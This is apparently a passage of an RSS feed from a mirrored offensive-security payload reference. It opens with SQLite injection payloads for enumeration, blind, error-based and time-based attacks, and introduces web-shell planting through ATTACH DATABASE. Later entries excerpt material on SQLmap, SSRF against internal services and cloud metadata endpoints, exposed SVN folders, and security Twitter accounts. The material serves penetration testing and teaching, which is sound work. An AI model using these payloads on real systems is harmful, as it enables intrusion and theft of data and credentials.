&lt;li&gt;&lt;a href="#sqlite-comments"&gt;SQLite Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-enumeration"&gt;SQLite Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-string"&gt;SQLite String&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#sqlite-string-methodology"&gt;SQLite String Methodology&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-blind"&gt;SQLite Blind&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#sqlite-blind-methodology"&gt;SQLite Blind Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-blind-with-substring-equivalent"&gt;SQLite Blind With Substring Equivalent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-error-based"&gt;SQlite Error Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-time-based"&gt;SQlite Time Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-remote-code-execution"&gt;SQlite Remote Code Execution&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#attach-database"&gt;Attach Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#load_extension"&gt;Load_extension&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-file-manipulation"&gt;SQLite File Manipulation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#sqlite-read-file"&gt;SQLite Read File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sqlite-write-file"&gt;SQLite Write File&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sqlite-comments" class="anchored-heading"&gt;SQLite Comments&lt;a class="heading-anchor" href="#sqlite-comments" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;Comment&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Single-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;--&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Multi-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;/**/&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="sqlite-enumeration" class="anchored-heading"&gt;SQLite Enumeration&lt;a class="heading-anchor" href="#sqlite-enumeration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;select sqlite_version();&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="sqlite-string" class="anchored-heading"&gt;SQLite String&lt;a class="heading-anchor" href="#sqlite-string" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="sqlite-string-methodology" class="anchored-heading"&gt;SQLite String Methodology&lt;a class="heading-anchor" href="#sqlite-string-methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Database Structure&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT sql FROM sqlite_schema&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Database Structure (sqlite_version &amp;gt; 3.33.0)&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT sql FROM sqlite_master&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Table Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT tbl_name FROM sqlite_master WHERE type='table'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Table Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Column Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Column Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Column Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='&amp;lt;TABLE_NAME&amp;gt;'&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Column Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT name FROM PRAGMA_TABLE_INFO('&amp;lt;TABLE_NAME&amp;gt;')&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="sqlite-blind" class="anchored-heading"&gt;SQLite Blind&lt;a class="heading-anchor" href="#sqlite-blind" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="sqlite-blind-methodology" class="anchored-heading"&gt;SQLite Blind Methodology&lt;a class="heading-anchor" href="#sqlite-blind-methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Count Number Of Tables&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) &amp;lt; number_of_table&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Enumerating Table Name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Info&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) &amp;gt; HEX('some_char')&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Extract Info (order by)&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN &amp;lt;order_element_1&amp;gt; ELSE &amp;lt;order_element_2&amp;gt; END&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="sqlite-blind-with-substring-equivalent" class="anchored-heading"&gt;SQLite Blind With Substring Equivalent&lt;a class="heading-anchor" href="#sqlite-blind-with-substring-equivalent" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Function&lt;/th&gt;
 &lt;th&gt;Example&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SUBSTRING&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SUBSTRING('foobar', &amp;lt;START&amp;gt;, &amp;lt;LENGTH&amp;gt;)&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SUBSTR&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SUBSTR('foobar', &amp;lt;START&amp;gt;, &amp;lt;LENGTH&amp;gt;)&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="sqlite-error-based" class="anchored-heading"&gt;SQlite Error Based&lt;a class="heading-anchor" href="#sqlite-error-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;CASE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHEN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;BOOLEAN_QUERY&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;THEN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;ELSE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;load_extension&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="sqlite-time-based" class="anchored-heading"&gt;SQlite Time Based&lt;a class="heading-anchor" href="#sqlite-time-based" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;RANDNUM&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ABCDEFG&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="k"&gt;UPPER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HEX&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RANDOMBLOB&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;SLEEPTIME&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="mi"&gt;00000000&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))))&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;AND&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1337&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ABCDEFG&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="k"&gt;UPPER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HEX&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RANDOMBLOB&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000000000&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))))&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="sqlite-remote-code-execution" class="anchored-heading"&gt;SQLite Remote Code Execution&lt;a class="heading-anchor" href="#sqlite-remote-code-execution" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="attach-database" class="anchored-heading"&gt;Attach Database&lt;a class="heading-anchor" href="#attach-database" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;This snippet shows how an attacker could abuse SQLite&amp;rsquo;s &lt;code&gt;ATTACH DATABASE&lt;/code&gt; feature to plant a web-shell on a server:&lt;/p&gt;</description></item><item><title>SQLmap</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/sqlmap/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/sqlmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios.
Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts.
Reinventing the wheel isn&amp;rsquo;t ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code.
However you should always know how SQLmap is working, and be able to replicate it manually if necessary.&lt;/p&gt;</description></item><item><title>SSRF Advanced Exploitation</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-request-forgery/ssrf-advanced-exploitation/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-request-forgery/ssrf-advanced-exploitation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Some services (e.g., Redis, Elasticsearch) allow unauthenticated data writes or command execution when accessed directly. An attacker could exploit SSRF to interact with these services, injecting malicious payloads like web shells or manipulating application state.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#dns-axfr"&gt;DNS AXFR&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#fastcgi"&gt;FastCGI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#memcached"&gt;Memcached&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#memcached"&gt;MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#redis"&gt;Redis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#smtp"&gt;SMTP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wsgi"&gt;WSGI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#zabbix"&gt;Zabbix&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dns-axfr" class="anchored-heading"&gt;DNS AXFR&lt;a class="heading-anchor" href="#dns-axfr" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Query an internal DNS resolver to trigger a full zone transfer (&lt;strong&gt;AXFR&lt;/strong&gt;) and exfiltrate a list of subdomains.&lt;/p&gt;</description></item><item><title>SSRF URL for Cloud Instances</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-request-forgery/ssrf-cloud-instances/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-request-forgery/ssrf-cloud-instances/</guid><description>&lt;blockquote&gt;
&lt;p&gt;When exploiting Server-Side Request Forgery (SSRF) in cloud environments, attackers often target metadata endpoints to retrieve sensitive instance information (e.g., credentials, configurations). Below is a categorized list of common URLs for various cloud and infrastructure providers&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-aws"&gt;SSRF URL for AWS Bucket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-aws-ecs"&gt;SSRF URL for AWS ECS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-aws-elastic-beanstalk"&gt;SSRF URL for AWS Elastic Beanstalk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-aws-lambda"&gt;SSRF URL for AWS Lambda&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-google-cloud"&gt;SSRF URL for Google Cloud&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-digital-ocean"&gt;SSRF URL for Digital Ocean&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-packetcloud"&gt;SSRF URL for Packetcloud&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-azure"&gt;SSRF URL for Azure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-openstackrackspace"&gt;SSRF URL for OpenStack/RackSpace&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-hp-helion"&gt;SSRF URL for HP Helion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-oracle-cloud"&gt;SSRF URL for Oracle Cloud&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-kubernetes-etcd"&gt;SSRF URL for Kubernetes ETCD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-alibaba"&gt;SSRF URL for Alibaba&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-hetzner-cloud"&gt;SSRF URL for Hetzner Cloud&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-docker"&gt;SSRF URL for Docker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssrf-url-for-rancher"&gt;SSRF URL for Rancher&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssrf-url-for-aws" class="anchored-heading"&gt;SSRF URL for AWS&lt;a class="heading-anchor" href="#ssrf-url-for-aws" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - &lt;a href="http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories"&gt;Docs&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Subdomains Enumeration</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/web-attack-surface/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/web-attack-surface/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://bokkapig.pages.dev/refs/internal/redteam/access/web-attack-surface/"&gt;InternalAllTheThings/redteam/access/web-attack-surface&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#enumerate-subdomains"&gt;Enumerate Subdomains&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomains-databases"&gt;Subdomains Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#bruteforce-subdomains"&gt;Bruteforce Subdomains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#certificate-transparency-logs"&gt;Certificate Transparency Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#dns-resolution"&gt;DNS Resolution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#technology-discovery"&gt;Technology Discovery&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomain-takovers"&gt;Subdomain Takeover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Subversion</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/subversion/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/subversion/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/anantshri/svn-extractor"&gt;anantshri/svn-extractor&lt;/a&gt; - Simple script to extract all web resources by means of .SVN folder exposed over network.&lt;/p&gt;</description></item><item><title>Twitter</title><link>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/twitter/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/twitter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="accounts" class="anchored-heading"&gt;Accounts&lt;a class="heading-anchor" href="#accounts" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://twitter.com/0xReconless"&gt;@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc &amp;amp; EdOverflow&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/Bugcrowd"&gt;@bugcrowd - Another american bug bounty platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/codingo_"&gt;@codingo_ - Global Head of Security Ops and Researcher Enablement bugcrowd, Maintainer of some great pentesting tools like NoSQLMap or VHostScan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/d0nutptr"&gt;@d0nutptr - part-time bug hunter, Lead Security Engineer at graplsec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/thedawgyg"&gt;@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/edoverflow"&gt;@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/filedescriptor"&gt;@filedescriptor - security researcher, bug hunter and content creator at 0xReconless&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/gentilkiwi"&gt;@GentilKiwi - Author of Mimikatz &amp;amp; Kekeo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/Hacker0x01"&gt;@Hacker0x01 - American bug bounty platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/hakluke"&gt;@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/InsiderPhD"&gt;@InsiderPhD - PhD student, occasional bug bounty hunter &amp;amp; educational cyber security youtuber&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/intigriti"&gt;@intigriti - European ethical hacking &amp;amp; bug bounty platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/jobertabma"&gt;@jobertabma - Co-founder of HackerOne, security researcher&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/LiveOverflow"&gt;@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/NahamSec"&gt;@NahamSec - Hacker &amp;amp; content creator &amp;amp; co-founder bugbountyforum and http://recon.dev&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/orange_8361"&gt;@orange_8361 - bug bounty hunter and security researcher, specialized on RCE bugs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/pentest_swissky"&gt;@pentest_swissky - Author of PayloadsAllTheThings &amp;amp; SSRFmap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/r0bre"&gt;@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/samwcyo"&gt;@samwcyo - Full time bug bounty hunter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/securinti"&gt;@securinti - Dutch bug bounty hunter &amp;amp; head of hackers and bord member @ intigriti&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/spaceraccoonsec"&gt;@spaceraccoon - Security researcher and white hat hacker. Has worked on several bug bounty programs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/stokfredrik"&gt;@Stök - Bug bounty hunter, cybersecurity educational content creator&lt;/a&gt;&lt;/li&gt;
